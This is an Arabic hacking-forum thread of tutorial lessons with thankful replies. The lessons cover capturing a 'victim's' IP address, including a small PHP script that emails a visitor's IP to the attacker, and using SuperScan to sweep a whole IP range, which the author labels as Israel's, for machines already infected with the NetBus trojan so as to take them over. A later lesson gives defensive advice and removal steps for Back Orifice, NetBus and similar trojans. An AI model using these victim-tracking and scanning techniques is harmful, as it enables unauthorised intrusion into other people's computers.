    ان كان عندك جدار ناري مثل ال zone alarm (مفضل ان يكون عندك جدار ناري لكي تحمي نفسل من شر افعالك خخخ )... انسخ الاي بي الهاص بك على شكل وصله.. مثلا http://212.212.212.212/
    على فرض ان 212.212.212.212 هو الاي بي حقك..
    واعطي الوصله للضحيه بأي حجه.. وعندما يضغط عليها سيعطيك الجدار الناري تنبيه بان هناك من يحاول اختراقك عن طريق بورت 80 ويعطيك الاي بي بتاعه.. (لا تخف لن يخترقك)
    هذه الطريقه لا يحبها البعض لانك بهذه الطريقه تعطي الاي بي بتاعك للضحيه

    صفحة php-
    افتح برنامج النوت باد واكتب فيه هذا الكود
    PHP Code


    $ip = $REMOTE_ADDR ;

    mail("youremail@hotmail.com","IP address",$ip) ;

    ?>




    ***64831;لا تنسى تغير youremail@hotmail.com الى ايميلك***64830;
    واحفظ الملف بصيغة php مثلا ip.php
    وارفع الملف في اي موقع مثلا
    http://www.alfares1.net/
    واعط الضحية وصلة الملف بيصير كذه
    www.alfares1.net/ip.php
    واذا ضغط الضحية الوصله انتظر ثواني و يجيك الآي بي حقه على ايميلك

    عن طريق موقع يوفر لك هذه الخدمهمثل هذا:
    http://almahrouqi.net/arabic.html
    اختر من قائمة خدماتنا.. احصل على اي بي صديقك
    والباقي سيكون واضح

    تحياتي للجميع
    الدرس الثامن
    البحث العشوائي عن الثغرات


    حتى الدرس الذي سبق هذا استطعنا اريال الباتش بعد تشفيره ودمجه وتغيير امتداده
    وراينا عدة طرق لارساله
    وعدة طرق لاخراج اي بي مايكل

    ولكن
    لو اردنا معرفة البورتات المفتوحه في جهاز مايكل.. من يدري ربما يوجد بورت جاهز عنده ويوفر علينا عناء ارسال الباتش.. فكيف نفعل ذلك..

    او ان كنا نريد الاختراق عن طريق النت باس مثلا ولكننا لا نعرف من نرد ان نخترق.. فكيف نفعل ذلك؟؟

    لهذا الدرس يلزمنا برنامج سكانر.. بمعتى اخر.. باحث عن الثغرات

    وساشرح الان البرنامج المفضل لدي وهو superscan

    لاحظ هذه الصوره:





    لنفرض ان ip مايكل هو 111.111.111.111 وتريد البحث عن جميع ثغرات اتصاله بالانترنت
    اذا في مجال البحث اكتب رقم الاي بي فوق وتحت

    اي ابحث من 111.111.111.111 حتى 111.111.111.111
    هذا لاننا لسنا معنيين بأي ip غير هذا الاي بي...

    وفي نوع البحث اختر اخر خيار وهو all ports from وضع المجال الذي موجود في الصوره
    وهو يعني من اصغر بورت حتى اكبر بورت

    اي اننا نريد ان نفحص اي ثغره من بين هذا المجال موجوده في حاسوب مايكل

    اضغط على start وسيبدأ البحث

    وسيظهر لك الاي بي بالاسفل وبجانبه علامة + اضغط عليها لتفتح القائمه

    انتهينا
    -------------------------------------------------


    الان لنفرض انه موجود لدينا برنامج النت باس مثلا
    الذي يعمل على بورت 12345
    وطبيعي اننا نريد ارسال باتش لاي شخص ونخترقه بالبرنامج
    ولكن هناك اشخاص مفتوح عندهم هذا البورت من قبل .. فكيف نبحث عنهم؟

    في مجال البحث نضع مجال البحث من ووو الى

    مثلا:
    من: 212.179.0.0
    الى: 212.179.255.255

    هذا المجال تابع لاسرائيل

    ومن توع البحث اختار اخر احتمال all ports from
    وضع الخيارات
    من 12345
    حتى 12345

    اي اننا نريد البحث فقط عن بورت واحد وهو بورت النت باس في هذا المجال من الايبيات

    بكلمات اخرى نحن نقول للسوبر سكان: ابحث لي في هذا المجال عن كل الاجهزه المصابه بثغرة النت باس

    واضغط start
    الايبيات المصابه يكون بجانبها +

    عندها ستخترق مباشرة


    -----------------------------------------
    وصلة تحميل الsuperscan الاصدار 3
    http://www.computec.ch/software/por...n/superscan.zip

    تقبلوا تحياتي
    الدرس التاسع
    حماية جهازك من الاختراق


    طبعا يا اصدقائي قبل البدء بالاختراق عليك ان تحمي نفسك
    لان الذي بيته من زجاج لا يرمي الناس بالحجاره
    خخخخخخخخخخخخخ

    اوكي في البدايه انصح ببرنامجين

    1) مكافح فيروسات جيد ويتم تحديثه بشكل مستمر
    2) جدار ناري مثل الزون الارم
    لب\\البرنامجين مشروحين اكثر من مره في المنتدى


    اصدقائي

    يجب توخي الحذر
    فأحيانا لا الانتي فيروس ينفع ولا حتى الجدار الناري مع زحمة البرامج التي توفر خاصيات مثل قتل الانتي فايروس والجدار الناري

    لذا يجب ان تنتبهوا لكل شئ تستقبلوه من اي شخص وكل صفحة انترنت يدعوكم للدخول اليها
    *******************************


    اذا ارسل اليك شخص صوره فكيف تعرف انها ليست باتش؟


    تضعها في المستندات مثلا و تختار ( عرض كصفحة ويب ) اذا طلعت صورة على اليمين فهذا الملف عادي اما اذا ما طلعت صورة فهذا باتش


    ----------------------------------------------------------------------------
    ----------------------------------------------------------------------------
    وهذا شرح منقول:

    كيف تحمي نفسك ؟
    الله هو الحامي و الحارس اولا و اخيرا .. لنفرض انك خرجت من منزلك هل ستعطي كل من تواجهه بياناتك هل ستضع لافته على صدرك بإسمك و بياناتك الشخصية. كلا . !! بالطبع لا .. هل يمكنك عمل ما تريد من غير الخوف من المتطفلين كلا .. إذا بمجرد دخولك على الشبكة اعتبر نفسك خرجت من بيتك .. وتخيل نفسك في وسط ميدان كبير مزدحم بالناس و الكثير من الفضوليين..هذا هو الحال عن دخولك للشبكة اعتبر نفسك خارج منزلك..! لا تترك اي بيانات او صور شخصية على جهازك.. هذه الاشياء مكانها الاقراص المرنه لهذا وجدت !!!

    كثير من برامج الحماية من الفايروسات تعامل اليوم ملفات التجسس او حصان طرواده ( نسبة إلى حصان طرواده الشهير الذي ارسل إلى الحصن و كان السبب في سقوطه) فايروسات و تستطيع الكشف عنها ..

    هناك برامج اخرى تستخدم فقط للحماية من التجسس مثل:
    +LookDown2000
    +NetBuster
    +IntruderAlert'99.

    لا يمكن تحديد مدى فعالية البرامج السابقة و هناك تضارب في الآراء حول مدى فعاليتها .. كما يقال انها على العكس تماما تسهل عملية الإختراق لكن يبقى الامر مثارا للجدل.

    كما تجنب الآتي:
    +لا تفتح أي ملف يصلك عبر البريد الإلكتروني مهما كان إلا إذا كنت تعرف مصدره .. و تعرف ما هو .
    +لا تحمل أي برامج من اي مكان كان و لا تستقبل البرامج عبر برامج الحوار .كون هذه الملفات في الغالب تكون مصاحبه لكثير من البرامج .

    طرق التخلص من ملفات التجسس
    عدد من اشهر ملفات التجسس و طرق التخلص منها .


    هذه مجموعة من اشهر ملفات التجسس و طرق الخلاص منها ..

    Back Oriface
    يعمل على فتح المنفذ 3317 لجهازك و يجعل مستخدمي برنامج باك اورفز قادرين على اختراقك .

    طريقة التخلص من الملف:

    1- من قائمة البداية Start اختر Run و اكتبRegedit
    2- من القائمة على اليسار اختر HKEY_LOCAL_MACHINE ثم Software ثم Microsoft ثم Windows ثم Current Virsion ثم Run أو احيانا Run Once.
    3- اسم الملف متغيير من مكان لأخر امتداده دائما Exe لكن يمكنك معرفته كون اسم الملف او السرفر تظهر بعده مسافةو من ثم .exe عندما تجد الملف الغه تماما ..

    Net Bus - النسخ قبل 2000
    هو الاكثر انتشارا على الشبكة .حجمه 470 كيلو بايت
    يستخدم المنافذ 12345 و المنافذ 12346و هو يمكن المخترق من السيطرة شبه الكاملة على جهازك .

    طريقة التخلص من الملف:

    1-اطفأ الجهاز و اعد تشغيلة بهيئة الوضع الآمن او Safe Mode .
    2- من الاعلى انتبع الخطوات من1و 2
    3- ابحث عن الملف التالي c:\windows\patch.exe و الغه و من ثم اعد تشغيل الجهاز.



    Net Bus 2000
    على عكس السابق فاسمه متغيير و حجمة 599 بايت.

    طريقة التخلص من الملف:

    1- من قائمة البداية Start اختر Run و اكتبRegedit
    2- من القائمة على اليسار اختر HKEY_LOCAL_Machine ثم Software ثم Microsoft ثم Windows ثم Current Virsion ثم Run services
    3- ابحث في القائمة على اليمين عنNBsvr.exe ( هذا هو اسم الملف في الغالب) هكذا انت على علم ان جهازك مصاب .. و عليك بالعلاج التالي .وحتى و ان لم تجد الملف السابق اكمل الخطوات التالية.
    4- انتقل إلى HKEY_LOCAL_USER ثم ابحث عن مجلد اسمه NetBus Server اضغط على المجلد بزر الفأرة الايمن اختر DELETE
    5- اختر إعادة تشغيل الجهاز بوضع دوس DOS
    5- اكتب Cd Winodw ثم إدخال Enter اتبعها ب CD system و ادخال و من ثم اكتب Del NBSvr.exe و ادخال ، Del NBHelp.dll و اخي Del Log.txt و انتهى . اعد تشغيل جهازك .



    Heack’a Tack’a
    يستخدم بروتوكل FTP مما يصعب الوصول اليه.يستخدم المنافذ رقم 31785 و 31787 و 31789 و 31791 .

    طريقة التخلص من الملف:

    1- من قائمة البداية Start اختر Run و اكتبRegedit
    2- من القائمة على اليسار اختر HKEY_LOCAL_MACHINE ثم Software ثم Microsoft ثم Windows ثم Current Virsion ثم Run أو احيانا Run
    3- ابحث عن Explorer32 و الذي يوافق المسار C:\WINDOWS\Expl32.exe و قم بحذفه



    NetSphere
    يستخدم المنافذ TCP 30100 - TCP 30101-TCP 30102

    طريقة التخلص من الملف:

    1- من قائمة البداية Start اختر Run و اكتبRegedit
    2- من القائمة على اليسار اختر HKEY_LOCAL_MACHINE ثم Software ثم Microsoft ثم Windows ثم Current Virsion ثم Run
    2-ابحث في الجهه اليمنى عن c:\windows\system\nssx.exe
    3- احذف هذا الملف . و اعد تشغيل الجهاز بواسطه الضغط على CTRL+ALT+DELETE.



    -*************************-
    اهم شئ ان تفحص ثغرات جهازك دائما وتتاكد منها
    وان تفحص ما هي البرامج التي تعمل في بدء التشغيل

    start
    run
    msconfig
    startup

    وانتبه لاي برنامج دخيل
    **************************
    هذا موقع به كل الثغرات والبرامج التي تستخدمها

    http://www.simovits.com/nyheter9902.html
    ***********************************
    ***********************************

    *************

    تحياتي للجميع

    lol! lol! lol!
    الرجوع الى أعلى الصفحة اذهب الى الأسفل
    na3noo3y
    مشرف عام
    مشرف عام


    عدد المساهمات: 3
    نقاط: 3
    تاريخ التسجيل: 15/08/2011
    العمر: 22
    الموقع: الشرقيه

    مُساهمةموضوع: رد: شرح جميع انواع الاختراق    الأحد أكتوبر 16, 2011 10:15 am

    [b][center]يابـو الشباااب تعبت وانا اقرا
    بس على العموووم مشكوور وماقصرت Basketball Very Happy
    الرجوع الى أعلى الصفحة اذهب الى الأسفل
    جون سينا هكر
    المدير العام
    المدير العام


    عدد المساهمات: 64
    نقاط: 132
    تاريخ التسجيل: 15/04/2011

    مُساهمةموضوع: رد: شرح جميع انواع الاختراق    السبت نوفمبر 05, 2011 11:12 am

    يسلمك ربي من كل شر حبي
    الرجوع الى أعلى الصفحة اذهب الى الأسفل
    dhk71
    مـديـر الــمــنــتــدى
    مـديـر الــمــنــتــدى


    عدد المساهمات: 1
    نقاط: 1
    تاريخ التسجيل: 05/12/2011

    مُساهمةموضوع: رد: شرح جميع انواع الاختراق    الإثنين ديسمبر 05, 2011 2:46 pm

    شرح جميل الف شكر
    الرجوع الى أعلى الصفحة اذهب الى الأسفل
     

    شرح جميع انواع الاختراق

    استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
    صفحة 1 من اصل 1

     مواضيع مماثلة

    -
    » حساب alertpay تم الاختراق
    » إخــتبارات جميع الفـــصول في جميع المواد 1AM
    » جميـع انواع برامج الشات الكتابي
    » ----> تنقسم الافتتاحيات شطرنج في افكارها الي ثلاثة انواع.....
    » حصريا برنامج تحويل الفيديو الرائع Any Video Converter Free 2.7.3 لتحويل كل انواع صيغ الفيديو الإثنين 23 أبريل 2012 - 15:58

    صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
    منتدى الهواوي :: -